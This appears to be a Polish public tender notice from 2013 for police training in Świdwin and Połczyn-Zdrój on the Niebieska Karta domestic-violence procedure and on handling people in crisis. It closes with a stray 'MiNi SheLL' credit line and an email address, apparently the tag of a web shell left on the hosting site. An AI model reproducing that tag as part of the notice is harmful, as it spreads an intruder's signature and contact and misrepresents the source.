a)ćwiczenia warsztatowe prowadzone będą równolegle w trzech grupach. Każdą grupę warsztatową prowadzi jeden trener; Wykonawca jest zobowiązany zapewnić pracę 3 trenerów po jednym w każdej z trzech grup równolegle. 
b)wykłady prowadzone będą dla całej grupy Użytkowników (maksymalnie 52 osoby) przez  minimum jednego trenera;
c)zajęcia 3 dniowe prowadzone będą w wymiarze łącznie 24 godziny zajęć dydaktycznych w ciągu trzech następujących po sobie dniach tygodnia (od poniedziałku do piątku). Poprzez godzinę zajęć dydaktycznych Zamawiający rozumie godzinę lekcyjną, czyli 45 minut zegarowych. 
d)miejsce szkolenia zostanie wskazane przez Zamawiającego. Ośrodek szkoleniowy zostanie wyłoniony w odrębnym postępowaniu, znajdował się będzie w promieniu do 80 km od Świdwina (woj. zachodniopomorskie).
e)Preferowany termin realizacji szkolenia: 3 dni w terminie 16-20 września 2013 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie szkoleń dla Zespołu Użytkowników biorących udział w projekcie Razem Przeciw Razom	Szkolenie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie nr 2 - skierowane do policjantów oddziału prewencji i dyżurnych - maksymalnie 45 osób
Szkolenie nr 2. Praca z klientem w kryzysie, empatia (1-dniowe dla 3 grup x 15 osób)

Cel szkolenia:
nabycie wiedzy przez policjantów w zakresie realizacji procedury Niebieskiej Karty 
uświadomienie policjantom, jakie znaczenie ma stosowanie spójnych standardów obsługi interesanta w budowaniu wizerunku instytucji tworzących system pomocy,
nabycie praktycznych umiejętności z zakresu pracy z trudnym interesantem, tj. interesantem wymagającym - znajdującym się w sytuacji kryzysowej; agresywnym; będącym pod wpływem środków odurzających; chorym psychicznie, szczególnie podczas interwencji
nabycie praktycznych umiejętności radzenia sobie z negatywnymi emocjami i stresem w pracy oraz sposoby zachowania i reagowania w bezpośrednim kontakcie z klientem agresywnym

Dzień 1
1.	Procedura Niebieskiej Karty.
2.	Prowadzenie interwencji oraz rozmowa z interesantem 
a) etapy i techniki prowadzenia rozmowy w trakcie interwencji w zależności od rodzaju klienta, ze szczególnym uwzględnieniem potrzeb osób doświadczających przemocy w rodzinie.
3.	Jak sobie radzić z trudnym interesantem tj. interesantem wymagającym - znajdującym się w sytuacji kryzysowej; agresywnym; będącym pod wpływem środków odurzających; chorym psychicznie.
a) metody i techniki pracy z różnymi grupami interesantów w zależności od ich specyfiki
b) metody i techniki reagowania na potrzeby interesantów - empatyczne podejście do interesantów doświadczających przemocy w rodzinie.
4. Wywieranie wpływu
a) jak demaskować techniki manipulacji i perswazji stosowane przez klientów, szczególnie w trakcie interwencji.
     b) reguły wywierania wpływ.

4	Dodatkowe wymagania:
1)	Dla szkolenia nr 1 i 2:
a)	metodyka szkoleń: wykład  i ćwiczenia warsztatowe;
b)	koszty dojazdu, zakwaterowania i wyżywienia trenerów pokrywa Wykonawca; 
c)	Wykonawca przygotuje materiały własne i opracowania wykładowców obejmujące swoim zakresem tematykę szkolenia spięte w estetyczny sposób lub zbindowane,  które zostaną wydane każdemu uczestnikowi szkolenia w momencie rozpoczęcia szkolenia (oznakowane zgodnie z wytycznymi EFS);
d)	Wykonawca dostarczy materiały piśmiennicze (długopis, notatnik formatu A4), które po zakończeniu szkolenia przekaże każdemu z uczestników na własność;
e)	Wykonawca przygotuje i wyda na zakończenie szkolenia uczestnikom szkoleń zaświadczenia o ich ukończeniu (oznakowane zgodnie z wytycznymi EFS);
f)	Zamawiający pokrywa koszty: wynajęcia sal szkoleniowych wraz z niezbędnym wyposażeniem i sprzętem (projektor, tablice typu flipchart), poczęstunki i zakwaterowania uczestników szkoleń.
g)	Wykonawca przygotowuje sprawozdania z przebiegu każdego szkolenia.
h)	Wykonawca przeprowadza ankiety ewaluacyjnej ex-ante i ex-post.
3)	Dla szkolenia nr 2:
a)	zajęcia prowadzone nierównolegle dla trzech grup 15-sto osobowych w wymiarze 8 godzin dydaktycznych; poprzez godzinę zajęć dydaktycznych Zamawiający rozumie godzinę lekcyjną, czyli 45 minut zegarowych.
b)	 zajęcia prowadzone będą w terminach: 11 września 2013 r., 18 września 2013 r., 25 września 2013 r.
c)	miejsce realizacji szkoleń: miasto Świdwin (2 terminy) miasto Połczyn-Zdrój (1 termin).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com